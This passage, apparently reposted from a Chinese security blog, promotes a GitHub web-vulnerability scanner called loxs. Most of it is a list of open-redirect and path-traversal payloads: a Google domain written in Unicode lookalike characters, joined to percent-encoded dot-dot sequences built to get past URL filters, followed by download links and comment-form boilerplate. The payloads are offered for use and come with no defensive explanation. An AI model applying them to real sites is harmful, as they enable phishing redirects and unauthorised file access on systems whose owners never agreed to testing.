////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e
////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e%2f
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e%2f
//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2e%2e%2f
////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f..
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f..
//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f..
////ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f%2e%2e
///ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f%2e%2e
//ⓖ𝑜𝗼𝕘𝕝𝑒.𝑐𝑜𝓂/%2f%2e%2e

xss,lfi等等

项目地址

GitHub:
https://github.com/coffinxp/loxs

下载地址

https://github.com/coffinxp/loxs/archive/refs/heads/main.zip

转载请注明出处及链接

One comment

Leave a Reply

您的邮箱地址不会被公开。 必填项已用 * 标注